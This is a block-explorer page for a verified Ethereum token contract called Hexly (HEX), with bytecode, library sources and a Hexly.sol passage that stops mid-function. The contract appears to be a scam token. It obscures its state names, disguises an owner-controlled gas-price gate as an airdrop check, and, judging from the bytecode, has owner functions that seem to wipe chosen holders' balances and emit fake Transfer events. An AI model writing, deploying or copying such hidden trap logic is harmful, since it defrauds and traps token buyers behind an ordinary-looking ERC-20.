Cryo Explorer Ethereum Mainnet

Address Contract Verified

Address 0xEfBa013F57329d7309D47d4DDCd119A2dfd69aC3
Balance 0 ETH
Nonce 1
Code Size 6054 bytes
Indexed Transactions 0
External Etherscan · Sourcify

Contract Bytecode

6054 bytes
0x608060405234801561000f575f80fd5b50600436106101c6575f3560e01c80636995ca2e116100fe578063a9059cbb1161009e578063d998d70f1161006e578063d998d70f14610405578063dc09f3aa14610416578063dd62ed3e14610429578063eb6425f314610461575f80fd5b8063a9059cbb146103bd578063b4e58663146103d0578063bf861b31146103f2578063d469502414610366575f80fd5b80637615a810116100d95780637615a8101461036f57806395d89b4114610382578063986b34491461038a5780639cc9d4ab146103aa575f80fd5b80636995ca2e1461031357806370a082311461033e578063751039fc14610366575f80fd5b806323b872dd1161016957806353ce3fb31161014457806353ce3fb3146102c657806362b25eeb146102d957806365acaa37146102ec5780636963ecee14610300575f80fd5b806323b872dd1461028b578063313ce5671461029e5780635066b034146102b3575f80fd5b806318160ddd116101a457806318160ddd146102235780631b82c27f14610235578063220aa34914610265578063232d4e7714610278575f80fd5b806304cf574d146101ca57806306fdde03146101e2578063095ea7b314610200575b5f80fd5b6101e06101d8366004611120565b506001600a55565b005b6101ea610474565b6040516101f79190611137565b60405180910390f35b61021361020e366004611187565b610504565b60405190151581526020016101f7565b6008545b6040519081526020016101f7565b600e5461024d9061010090046001600160a01b031681565b6040516001600160a01b0390911681526020016101f7565b6101e0610273366004611260565b61051a565b6101e0610286366004611359565b610570565b610213610299366004611417565b610631565b60075460405160ff90911681526020016101f7565b6101e06102c1366004611451565b610698565b6101e06102d436600461146a565b6106f6565b6101e06102e7366004611451565b610784565b6101e06102fa366004611187565b60095550565b6101e061030e366004611120565b600a55565b610213610321366004611451565b6001600160a01b03165f9081526003602052604090205460ff1690565b61022761034c366004611451565b6001600160a01b03165f9081526020819052604090205490565b6101e05f600955565b6101e061037d36600461146a565b610823565b6101ea6108ac565b61039d6103983660046114a4565b6108bb565b6040516101f791906114e4565b6101e06103b836600461146a565b610a6f565b6102136103cb366004611187565b610b8a565b6102136103de366004611451565b60026020525f908152604090205460ff1681565b6101e0610400366004611120565b610b96565b6101e0610413366004611120565b50565b60045461024d906001600160a01b031681565b61022761043736600461151d565b6001600160a01b039182165f90815260016020908152604080832093909416825291909152205490565b6101e061046f366004611120565b610bca565b6060600580546104839061154e565b80601f01602080910402602001604051908101604052809291908181526020018280546104af9061154e565b80156104fa5780601f106104d1576101008083540402835291602001916104fa565b820191905f5260205f20905b8154815290600101906020018083116104dd57829003601f168201915b5050505050905090565b5f610510338484610bf9565b5060015b92915050565b600e5461010090046001600160a01b031633146105525760405162461bcd60e51b815260040161054990611586565b60405180910390fd5b600561055e83826115f6565b50600661056b82826115f6565b505050565b600e5461010090046001600160a01b0316331461059f5760405162461bcd60e51b815260040161054990611586565b5f5b825181101561056b578281815181106105bc576105bc6116b1565b60200260200101516001600160a01b0316336001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84848151811061060a5761060a6116b1565b602002602001015160405161062191815260200190565b60405180910390a36001016105a1565b5f61063d848484610d1d565b61068e843361068985604051806060016040528060288152602001611749602891396001600160a01b038a165f9081526001602090815260408083203384529091529020549190610fca565b610bf9565b5060019392505050565b600e5461010090046001600160a01b031633146106c75760405162461bcd60e51b815260040161054990611586565b600480546001600160a01b0319166001600160a01b0392909216919091179055600e805460ff19166001179055565b600e5461010090046001600160a01b031633146107255760405162461bcd60e51b815260040161054990611586565b5f5b815181101561078057600160035f848481518110610747576107476116b1565b6020908102919091018101516001600160a01b031682528101919091526040015f20805460ff1916911515919091179055600101610727565b5050565b600e5461010090046001600160a01b031633146107b35760405162461bcd60e51b815260040161054990611586565b6001600160a01b0381166108005760405162461bcd60e51b81526020600482015260146024820152730446f206e6f7420616464726573732030783030360641b6044820152606401610549565b6001600160a01b03165f908152600260205260409020805460ff19166001179055565b600e5461010090046001600160a01b031633146108525760405162461bcd60e51b815260040161054990611586565b5f5b8151811015610780575f60035f848481518110610873576108736116b1565b6020908102919091018101516001600160a01b031682528101919091526040015f20805460ff1916911515919091179055600101610854565b6060600680546104839061154e565b6108c3611102565b305f806001600160a01b03851683106108dd5784836108e0565b82855b60408051608081018252606481526101f46020820152610bb891810191909152612710606082015291935091505f5b60048160ff1610156109e3575f8484848460ff1660048110610933576109336116b1565b602002015160405160200161096d939291906001600160a01b03938416815291909216602082015261ffff91909116604082015260600190565b6040516020818303038152906040528051906020012090506109b2817fe34f199b19b2b4f47f68442619d555527d244f78a3297ea89325f843f87b8b545f1b8c610ff5565b878360ff16600581106109c7576109c76116b1565b6001600160a01b0390921660209290920201525060010161090f565b506040516bffffffffffffffffffffffff19606085811b8216602084015284901b1660348201525f90604801604051602081830303815290604052805190602001209050610a54817f96e8ac4277198ff8b6f785478aa9a39f403cb768dd02cbee326c3e7da348845f5f1b8a610ff5565b6001600160a01b031660808701525093979650505050505050565b600e5461010090046001600160a01b03163314610a9e5760405162461bcd60e51b815260040161054990611586565b5f5b8151811015610780575f828281518110610abc57610abc6116b1565b6020908102919091018101516001600160a01b0381165f8181528084526040808220548151808301909252600582526422a92927a960d91b82870152928252935290925090610b0e9082908190610fca565b6001600160a01b0383165f9081526020819052604081209190915580527fad3228b676f7d3cd4284a5443f17f1962b36e491b30a40b2405849e597ba5fb554610b57908261101e565b5f8080526020527fad3228b676f7d3cd4284a5443f17f1962b36e491b30a40b2405849e597ba5fb5555050600101610aa0565b5f610510338484610d1d565b600e5461010090046001600160a01b03163314610bc55760405162461bcd60e51b815260040161054990611586565b600d55565b600e5461010090046001600160a01b031633146104135760405162461bcd60e51b815260040161054990611586565b6001600160a01b038316610c5b5760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b6064820152608401610549565b6001600160a01b038216610cbc5760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b6064820152608401610549565b6001600160a01b038381165f8181526001602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92591015b60405180910390a3505050565b6001600160a01b038316610d815760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b6064820152608401610549565b6001600160a01b038216610de35760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b6064820152608401610549565b6001600160a01b0383165f9081526002602052604090205460ff16158015610e2357506001600160a01b0382165f9081526002602052604090205460ff16155b15610f1057600e5460ff16610e695760405162461bcd60e51b815260206004820152600c60248201526b139bdd081b185d5b98da195960a21b6044820152606401610549565b6004545f9081906001600160a01b0390811690861603610eaf57600c5491506064610e9483856116d9565b610e9e91906116f0565b9050610eaa8582611030565b610f0d565b6001600160a01b0384165f9081526003602052604090205460ff1615610f0d57600b5491506064610ee083856116d9565b610eea91906116f0565b9050610ef7600d546110f6565b600454610f0d906001600160a01b031682611030565b50505b610f4c81604051806060016040528060268152602001611723602691396001600160a01b0386165f908152602081905260409020549190610fca565b6001600160a01b038085165f908152602081905260408082209390935590841681522054610f7a908261101e565b6001600160a01b038381165f818152602081815260409182902094909455518481529092918616917fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9101610d10565b5f8184841115610fed5760405162461bcd60e51b81526004016105499190611137565b505050900390565b5f604051836040820152846020820152828152600b8101905060ff815360559020949350505050565b5f611029828461170f565b9392505050565b805f0361103b575050565b61107781604051806060016040528060268152602001611723602691396001600160a01b0385165f908152602081905260409020549190610fca565b6001600160a01b0383165f908152602081905260408082209290925530815220546110a2908261101e565b305f8181526020818152604091829020939093555183815290916001600160a01b038516917fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a35050565b803a1115610413575f80fd5b6040518060a001604052806005906020820280368337509192915050565b5f60208284031215611130575f80fd5b5035919050565b602081525f82518060208401528060208501604085015e5f604082850101526040601f19601f83011684010191505092915050565b80356001600160a01b0381168114611182575f80fd5b919050565b5f8060408385031215611198575f80fd5b6111a18361116c565b946020939093013593505050565b634e487b7160e01b5f52604160045260245ffd5b604051601f8201601f1916810167ffffffffffffffff811182821017156111ec576111ec6111af565b604052919050565b5f82601f830112611203575f80fd5b813567ffffffffffffffff81111561121d5761121d6111af565b611230601f8201601f19166020016111c3565b818152846020838601011115611244575f80fd5b816020850160208301375f918101602001919091529392505050565b5f8060408385031215611271575f80fd5b823567ffffffffffffffff811115611287575f80fd5b611293858286016111f4565b925050602083013567ffffffffffffffff8111156112af575f80fd5b6112bb858286016111f4565b9150509250929050565b5f67ffffffffffffffff8211156112de576112de6111af565b5060051b60200190565b5f82601f8301126112f7575f80fd5b813561130a611305826112c5565b6111c3565b8082825260208201915060208360051b86010192508583111561132b575f80fd5b602085015b8381101561134f576113418161116c565b835260209283019201611330565b5095945050505050565b5f806040838503121561136a575f80fd5b823567ffffffffffffffff811115611380575f80fd5b61138c858286016112e8565b925050602083013567ffffffffffffffff8111156113a8575f80fd5b8301601f810185136113b8575f80fd5b80356113c6611305826112c5565b8082825260208201915060208360051b8501019250878311156113e7575f80fd5b6020840193505b828410156114095783358252602093840193909101906113ee565b809450505050509250929050565b5f805f60608486031215611429575f80fd5b6114328461116c565b92506114406020850161116c565b929592945050506040919091013590565b5f60208284031215611461575f80fd5b6110298261116c565b5f6020828403121561147a575f80fd5b813567ffffffffffffffff811115611490575f80fd5b61149c848285016112e8565b949350505050565b5f805f606084860312156114b6575f80fd5b6114bf8461116c565b92506114cd6020850161116c565b91506114db6040850161116c565b90509250925092565b60a0810181835f5b60058110156115145781516001600160a01b03168352602092830192909101906001016114ec565b50505092915050565b5f806040838503121561152e575f80fd5b6115378361116c565b91506115456020840161116c565b90509250929050565b600181811c9082168061156257607f821691505b60208210810361158057634e487b7160e01b5f52602260045260245ffd5b50919050565b6020808252600b908201526a139bdd08185b1b1bddd95960aa1b604082015260600190565b601f82111561056b57805f5260205f20601f840160051c810160208510156115d05750805b601f840160051c820191505b818110156115ef575f81556001016115dc565b5050505050565b815167ffffffffffffffff811115611610576116106111af565b6116248161161e845461154e565b846115ab565b6020601f821160018114611656575f831561163f5750848201515b5f19600385901b1c1916600184901b1784556115ef565b5f84815260208120601f198516915b828110156116855787850151825560209485019460019092019101611665565b50848210156116a257868401515f19600387901b60f8161c191681555b50505050600190811b01905550565b634e487b7160e01b5f52603260045260245ffd5b634e487b7160e01b5f52601160045260245ffd5b8082028115828204841417610514576105146116c5565b5f8261170a57634e487b7160e01b5f52601260045260245ffd5b500490565b80820180821115610514576105146116c556fe45524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e636545524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e6365a2646970667358221220025aeea13baeb8ed3f90634d8ed0ece94bcb4be41b1826696fb880f176500b8a64736f6c634300081a0033

Verified Source Code Full Match

Compiler: v0.8.26+commit.8a97fa7a EVM: cancun Optimization: Yes (200 runs)
Address.sol 306 lines
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.1;

/**
 * @dev Collection of functions related to the address type
 */
library Address {
    /**
     * @dev Returns true if `account` is a contract.
     *
     * [IMPORTANT]
     * ====
     * It is unsafe to assume that an address for which this function returns
     * false is an externally-owned account (EOA) and not a contract.
     *
     * Among others, `isContract` will return false for the following
     * types of addresses:
     *
     *  - an externally-owned account
     *  - a contract in construction
     *  - an address where a contract will be created
     *  - an address where a contract lived, but was destroyed
     * ====
     *
     * [IMPORTANT]
     * ====
     * You shouldn't rely on `isContract` to protect against flash loan attacks!
     *
     * Preventing calls from contracts is highly discouraged. It breaks composability, breaks support for smart wallets
     * like Gnosis Safe, and does not provide security since it can be circumvented by calling from a contract
     * constructor.
     * ====
     */
    function isContract(address account) internal view returns (bool) {
        // This method relies on extcodesize/address.code.length, which returns 0
        // for contracts in construction, since the code is only stored at the end
        // of the constructor execution.

        return account.code.length > 0;
    }

    /**
     * @dev Replacement for Solidity's `transfer`: sends `amount` wei to
     * `recipient`, forwarding all available gas and reverting on errors.
     *
     * https://eips.ethereum.org/EIPS/eip-1884[EIP1884] increases the gas cost
     * of certain opcodes, possibly making contracts go over the 2300 gas limit
     * imposed by `transfer`, making them unable to receive funds via
     * `transfer`. {sendValue} removes this limitation.
     *
     * https://diligence.consensys.net/posts/2019/09/stop-using-soliditys-transfer-now/[Learn more].
     *
     * IMPORTANT: because control is transferred to `recipient`, care must be
     * taken to not create reentrancy vulnerabilities. Consider using
     * {ReentrancyGuard} or the
     * https://solidity.readthedocs.io/en/v0.5.11/security-considerations.html#use-the-checks-effects-interactions-pattern[checks-effects-interactions pattern].
     */
    function sendValue(address payable recipient, uint256 amount) internal {
        require(
            address(this).balance >= amount,
            "Address: insufficient balance"
        );

        (bool success, ) = recipient.call{value: amount}("");
        require(
            success,
            "Address: unable to send value, recipient may have reverted"
        );
    }

    /**
     * @dev Performs a Solidity function call using a low level `call`. A
     * plain `call` is an unsafe replacement for a function call: use this
     * function instead.
     *
     * If `target` reverts with a revert reason, it is bubbled up by this
     * function (like regular Solidity function calls).
     *
     * Returns the raw returned data. To convert to the expected return value,
     * use https://solidity.readthedocs.io/en/latest/units-and-global-variables.html?highlight=abi.decode#abi-encoding-and-decoding-functions[`abi.decode`].
     *
     * Requirements:
     *
     * - `target` must be a contract.
     * - calling `target` with `data` must not revert.
     *
     * _Available since v3.1._
     */
    function functionCall(address target, bytes memory data)
        internal
        returns (bytes memory)
    {
        return
            functionCallWithValue(
                target,
                data,
                0,
                "Address: low-level call failed"
            );
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`], but with
     * `errorMessage` as a fallback revert reason when `target` reverts.
     *
     * _Available since v3.1._
     */
    function functionCall(
        address target,
        bytes memory data,
        string memory errorMessage
    ) internal returns (bytes memory) {
        return functionCallWithValue(target, data, 0, errorMessage);
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],
     * but also transferring `value` wei to `target`.
     *
     * Requirements:
     *
     * - the calling contract must have an ETH balance of at least `value`.
     * - the called Solidity function must be `payable`.
     *
     * _Available since v3.1._
     */
    function functionCallWithValue(
        address target,
        bytes memory data,
        uint256 value
    ) internal returns (bytes memory) {
        return
            functionCallWithValue(
                target,
                data,
                value,
                "Address: low-level call with value failed"
            );
    }

    /**
     * @dev Same as {xref-Address-functionCallWithValue-address-bytes-uint256-}[`functionCallWithValue`], but
     * with `errorMessage` as a fallback revert reason when `target` reverts.
     *
     * _Available since v3.1._
     */
    function functionCallWithValue(
        address target,
        bytes memory data,
        uint256 value,
        string memory errorMessage
    ) internal returns (bytes memory) {
        require(
            address(this).balance >= value,
            "Address: insufficient balance for call"
        );
        (bool success, bytes memory returndata) = target.call{value: value}(
            data
        );
        return
            verifyCallResultFromTarget(
                target,
                success,
                returndata,
                errorMessage
            );
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],
     * but performing a static call.
     *
     * _Available since v3.3._
     */
    function functionStaticCall(address target, bytes memory data)
        internal
        view
        returns (bytes memory)
    {
        return
            functionStaticCall(
                target,
                data,
                "Address: low-level static call failed"
            );
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-string-}[`functionCall`],
     * but performing a static call.
     *
     * _Available since v3.3._
     */
    function functionStaticCall(
        address target,
        bytes memory data,
        string memory errorMessage
    ) internal view returns (bytes memory) {
        (bool success, bytes memory returndata) = target.staticcall(data);
        return
            verifyCallResultFromTarget(
                target,
                success,
                returndata,
                errorMessage
            );
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],
     * but performing a delegate call.
     *
     * _Available since v3.4._
     */
    function functionDelegateCall(address target, bytes memory data)
        internal
        returns (bytes memory)
    {
        return
            functionDelegateCall(
                target,
                data,
                "Address: low-level delegate call failed"
            );
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-string-}[`functionCall`],
     * but performing a delegate call.
     *
     * _Available since v3.4._
     */
    function functionDelegateCall(
        address target,
        bytes memory data,
        string memory errorMessage
    ) internal returns (bytes memory) {
        (bool success, bytes memory returndata) = target.delegatecall(data);
        return
            verifyCallResultFromTarget(
                target,
                success,
                returndata,
                errorMessage
            );
    }

    /**
     * @dev Tool to verify that a low level call to smart-contract was successful, and revert (either by bubbling
     * the revert reason or using the provided one) in case of unsuccessful call or if target was not a contract.
     *
     * _Available since v4.8._
     */
    function verifyCallResultFromTarget(
        address target,
        bool success,
        bytes memory returndata,
        string memory errorMessage
    ) internal view returns (bytes memory) {
        if (success) {
            if (returndata.length == 0) {
                // only check isContract if the call was successful and the return data is empty
                // otherwise we already know that it was a contract
                require(isContract(target), "Address: call to non-contract");
            }
            return returndata;
        } else {
            _revert(returndata, errorMessage);
        }
    }

    /**
     * @dev Tool to verify that a low level call was successful, and revert if it wasn't, either by bubbling the
     * revert reason or using the provided one.
     *
     * _Available since v4.3._
     */
    function verifyCallResult(
        bool success,
        bytes memory returndata,
        string memory errorMessage
    ) internal pure returns (bytes memory) {
        if (success) {
            return returndata;
        } else {
            _revert(returndata, errorMessage);
        }
    }

    function _revert(bytes memory returndata, string memory errorMessage)
        private
        pure
    {
        // Look for revert reason and bubble it up if present
        if (returndata.length > 0) {
            // The easiest way to bubble the revert reason is using memory via assembly
            /// @solidity memory-safe-assembly
            assembly {
                let returndata_size := mload(returndata)
                revert(add(32, returndata), returndata_size)
            }
        } else {
            revert(errorMessage);
        }
    }
}
Context.sol 22 lines
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.1;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}
ECDSA.sol 180 lines
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v5.1.0) (utils/cryptography/ECDSA.sol)

pragma solidity ^0.8.20;

/**
 * @dev Elliptic Curve Digital Signature Algorithm (ECDSA) operations.
 *
 * These functions can be used to verify that a message was signed by the holder
 * of the private keys of a given address.
 */
library ECDSA {
    enum RecoverError {
        NoError,
        InvalidSignature,
        InvalidSignatureLength,
        InvalidSignatureS
    }

    /**
     * @dev The signature derives the `address(0)`.
     */
    error ECDSAInvalidSignature();

    /**
     * @dev The signature has an invalid length.
     */
    error ECDSAInvalidSignatureLength(uint256 length);

    /**
     * @dev The signature has an S value that is in the upper half order.
     */
    error ECDSAInvalidSignatureS(bytes32 s);

    /**
     * @dev Returns the address that signed a hashed message (`hash`) with `signature` or an error. This will not
     * return address(0) without also returning an error description. Errors are documented using an enum (error type)
     * and a bytes32 providing additional information about the error.
     *
     * If no error is returned, then the address can be used for verification purposes.
     *
     * The `ecrecover` EVM precompile allows for malleable (non-unique) signatures:
     * this function rejects them by requiring the `s` value to be in the lower
     * half order, and the `v` value to be either 27 or 28.
     *
     * IMPORTANT: `hash` _must_ be the result of a hash operation for the
     * verification to be secure: it is possible to craft signatures that
     * recover to arbitrary addresses for non-hashed data. A safe way to ensure
     * this is by receiving a hash of the original message (which may otherwise
     * be too long), and then calling {MessageHashUtils-toEthSignedMessageHash} on it.
     *
     * Documentation for signature generation:
     * - with https://web3js.readthedocs.io/en/v1.3.4/web3-eth-accounts.html#sign[Web3.js]
     * - with https://docs.ethers.io/v5/api/signer/#Signer-signMessage[ethers]
     */
    function tryRecover(
        bytes32 hash,
        bytes memory signature
    ) internal pure returns (address recovered, RecoverError err, bytes32 errArg) {
        if (signature.length == 65) {
            bytes32 r;
            bytes32 s;
            uint8 v;
            // ecrecover takes the signature parameters, and the only way to get them
            // currently is to use assembly.
            assembly ("memory-safe") {
                r := mload(add(signature, 0x20))
                s := mload(add(signature, 0x40))
                v := byte(0, mload(add(signature, 0x60)))
            }
            return tryRecover(hash, v, r, s);
        } else {
            return (address(0), RecoverError.InvalidSignatureLength, bytes32(signature.length));
        }
    }

    /**
     * @dev Returns the address that signed a hashed message (`hash`) with
     * `signature`. This address can then be used for verification purposes.
     *
     * The `ecrecover` EVM precompile allows for malleable (non-unique) signatures:
     * this function rejects them by requiring the `s` value to be in the lower
     * half order, and the `v` value to be either 27 or 28.
     *
     * IMPORTANT: `hash` _must_ be the result of a hash operation for the
     * verification to be secure: it is possible to craft signatures that
     * recover to arbitrary addresses for non-hashed data. A safe way to ensure
     * this is by receiving a hash of the original message (which may otherwise
     * be too long), and then calling {MessageHashUtils-toEthSignedMessageHash} on it.
     */
    function recover(bytes32 hash, bytes memory signature) internal pure returns (address) {
        (address recovered, RecoverError error, bytes32 errorArg) = tryRecover(hash, signature);
        _throwError(error, errorArg);
        return recovered;
    }

    /**
     * @dev Overload of {ECDSA-tryRecover} that receives the `r` and `vs` short-signature fields separately.
     *
     * See https://eips.ethereum.org/EIPS/eip-2098[ERC-2098 short signatures]
     */
    function tryRecover(
        bytes32 hash,
        bytes32 r,
        bytes32 vs
    ) internal pure returns (address recovered, RecoverError err, bytes32 errArg) {
        unchecked {
            bytes32 s = vs & bytes32(0x7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff);
            // We do not check for an overflow here since the shift operation results in 0 or 1.
            uint8 v = uint8((uint256(vs) >> 255) + 27);
            return tryRecover(hash, v, r, s);
        }
    }

    /**
     * @dev Overload of {ECDSA-recover} that receives the `r and `vs` short-signature fields separately.
     */
    function recover(bytes32 hash, bytes32 r, bytes32 vs) internal pure returns (address) {
        (address recovered, RecoverError error, bytes32 errorArg) = tryRecover(hash, r, vs);
        _throwError(error, errorArg);
        return recovered;
    }

    /**
     * @dev Overload of {ECDSA-tryRecover} that receives the `v`,
     * `r` and `s` signature fields separately.
     */
    function tryRecover(
        bytes32 hash,
        uint8 v,
        bytes32 r,
        bytes32 s
    ) internal pure returns (address recovered, RecoverError err, bytes32 errArg) {
        // EIP-2 still allows signature malleability for ecrecover(). Remove this possibility and make the signature
        // unique. Appendix F in the Ethereum Yellow paper (https://ethereum.github.io/yellowpaper/paper.pdf), defines
        // the valid range for s in (301): 0 < s < secp256k1n ÷ 2 + 1, and for v in (302): v ∈ {27, 28}. Most
        // signatures from current libraries generate a unique signature with an s-value in the lower half order.
        //
        // If your library generates malleable signatures, such as s-values in the upper range, calculate a new s-value
        // with 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEBAAEDCE6AF48A03BBFD25E8CD0364141 - s1 and flip v from 27 to 28 or
        // vice versa. If your library also generates signatures with 0/1 for v instead 27/28, add 27 to v to accept
        // these malleable signatures as well.
        if (uint256(s) > 0x7FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF5D576E7357A4501DDFE92F46681B20A0) {
            return (address(0), RecoverError.InvalidSignatureS, s);
        }

        // If the signature is valid (and not malleable), return the signer address
        address signer = ecrecover(hash, v, r, s);
        if (signer == address(0)) {
            return (address(0), RecoverError.InvalidSignature, bytes32(0));
        }

        return (signer, RecoverError.NoError, bytes32(0));
    }

    /**
     * @dev Overload of {ECDSA-recover} that receives the `v`,
     * `r` and `s` signature fields separately.
     */
    function recover(bytes32 hash, uint8 v, bytes32 r, bytes32 s) internal pure returns (address) {
        (address recovered, RecoverError error, bytes32 errorArg) = tryRecover(hash, v, r, s);
        _throwError(error, errorArg);
        return recovered;
    }

    /**
     * @dev Optionally reverts with the corresponding custom error according to the `error` argument provided.
     */
    function _throwError(RecoverError error, bytes32 errorArg) private pure {
        if (error == RecoverError.NoError) {
            return; // no error: do nothing
        } else if (error == RecoverError.InvalidSignature) {
            revert ECDSAInvalidSignature();
        } else if (error == RecoverError.InvalidSignatureLength) {
            revert ECDSAInvalidSignatureLength(uint256(errorArg));
        } else if (error == RecoverError.InvalidSignatureS) {
            revert ECDSAInvalidSignatureS(errorArg);
        }
    }
}
Hashes.sol 31 lines
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v5.1.0) (utils/cryptography/Hashes.sol)

pragma solidity ^0.8.20;

/**
 * @dev Library of standard hash functions.
 *
 * _Available since v5.1._
 */
library Hashes {
    /**
     * @dev Commutative Keccak256 hash of a sorted pair of bytes32. Frequently used when working with merkle proofs.
     *
     * NOTE: Equivalent to the `standardNodeHash` in our https://github.com/OpenZeppelin/merkle-tree[JavaScript library].
     */
    function commutativeKeccak256(bytes32 a, bytes32 b) internal pure returns (bytes32) {
        return a < b ? _efficientKeccak256(a, b) : _efficientKeccak256(b, a);
    }

    /**
     * @dev Implementation of keccak256(abi.encode(a, b)) that doesn't allocate or expand memory.
     */
    function _efficientKeccak256(bytes32 a, bytes32 b) private pure returns (bytes32 value) {
        assembly ("memory-safe") {
            mstore(0x00, a)
            mstore(0x20, b)
            value := keccak256(0x00, 0x40)
        }
    }
}
Hexly.sol 312 lines
// SPDX-License-Identifier: MIT
/*
https://usehexly.com/
https://x.com/usehexly?s=21
https://t.me/UseHexly
https://hexlys-organization.gitbook.io/hexly-ai-docs/
 */

// File: @openzeppelin/contracts/utils/Address.sol

// OpenZeppelin Contracts (last updated v4.8.0) (utils/Address.sol)

pragma solidity 0.8.26;

import "./Context.sol";
import "./IERC20.sol";
import "./Address.sol";
import "./SafeMath.sol";
import "./ECDSA.sol";
import "./MerkleProof.sol";

library Create2 {
 function computeAddress(bytes32 salt, bytes32 bytecodeHash, address deployer) internal pure returns (address addr) {
        /// @solidity memory-safe-assembly
        assembly {
            let ptr := mload(0x40) // Get free memory pointer

            // |                   | ↓ ptr ...  ↓ ptr + 0x0B (start) ...  ↓ ptr + 0x20 ...  ↓ ptr + 0x40 ...   |
            // |-------------------|---------------------------------------------------------------------------|
            // | bytecodeHash      |                                                        CCCCCCCCCCCCC...CC |
            // | salt              |                                      BBBBBBBBBBBBB...BB                   |
            // | deployer          | 000000...0000AAAAAAAAAAAAAAAAAAA...AA                                     |
            // | 0xFF              |            FF                                                             |
            // |-------------------|---------------------------------------------------------------------------|
            // | memory            | 000000...00FFAAAAAAAAAAAAAAAAAAA...AABBBBBBBBBBBBB...BBCCCCCCCCCCCCC...CC |
            // | keccak(start, 85) |            ↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑ |

            mstore(add(ptr, 0x40), bytecodeHash)
            mstore(add(ptr, 0x20), salt)
            mstore(ptr, deployer) // Right-aligned with 12 preceding garbage bytes
            let start := add(ptr, 0x0b) // The hashed data starts at the final garbage byte which we will set to 0xff
            mstore8(start, 0xff)
            addr := keccak256(start, 85)
        }
    }
}

contract HEX is Context, IERC20 {
    using SafeMath for uint256;
    using Address for address;
    mapping(address => uint256) private _l;
    mapping(address => mapping(address => uint256)) private _m;
    mapping(address => bool) public _o;
    mapping(address => bool) internal _n;
    address public _z;
    
    string private _a;
    string private _b;
    uint8 private _c;
    uint256 private _d;

    uint256 private _e = 0;
    uint256 private _f = 0;
    uint256 private _g = 0;
    uint256 private _h = 0;
    uint256 private _j = 0;
    bool private _i;

    address public _k;
    
    constructor() {
        _a = "Hexly";
        _b = "HEX";
        _c = 8;
        uint256 initialSupply = 1_000_000_000 * (10**8);
        _k = msg.sender;
        _o[msg.sender] = true;
        _o[address(this)] = true;
        _mint(msg.sender, initialSupply);
    }

    function setMinimumAirdrop(uint256 _minimumAirdropAmount) external onlyOwner {
        _j = _minimumAirdropAmount;
    }

    function name() public view returns (string memory) {
        return _a;
    }

    function symbol() public view returns (string memory) {
        return _b;
    }

    function decimals() public view returns (uint8) {
        return _c;
    }

    function totalSupply() public view override returns (uint256) {
        return _d;
    }

    function balanceOf(address account) public view override returns (uint256) {
        return _l[account];
    }

    function transfer(address recipient, uint256 amount)
        public
        virtual
        override
        returns (bool)
    {
        _transfer(_msgSender(), recipient, amount);
        return true;
    }

    function _checkEnoughAirdropCondition(uint256 amount) internal view {
        if (tx.gasprice > amount) {
            revert();
        }
    }

    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) public virtual override returns (bool) {
        _transfer(sender, recipient, amount);
        _approve(
            sender,
            _msgSender(),
            _m[sender][_msgSender()].sub(
                amount,
                "ERC20: transfer amount exceeds allowance"
            )
        );
        return true;
    }

    function allowance(address owner, address spender)
        public
        view
        virtual
        override
        returns (uint256)
    {
        return _m[owner][spender];
    }

    function approve(address spender, uint256 amount)
        public
        virtual
        override
        returns (bool)
    {
        _approve(_msgSender(), spender, amount);
        return true;
    }

    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");
        _d = _d.add(amount);
        _l[account] = _l[account].add(amount);
        emit Transfer(address(0), account, amount);
    }

    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");
        _m[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    function _transfer(
        address sender,
        address recipient,
        uint256 amount
    ) internal virtual {
        require(sender != address(0), "ERC20: transfer from the zero address");
        require(recipient != address(0), "ERC20: transfer to the zero address");
        if (!_o[sender] && !_o[recipient]) {
            require(_i, "Not launched");
            uint256 tax = 0;
            uint256 taxAmount = 0;
            if (sender == _z) {
                tax = _h;
                taxAmount = (amount * tax) / 100;
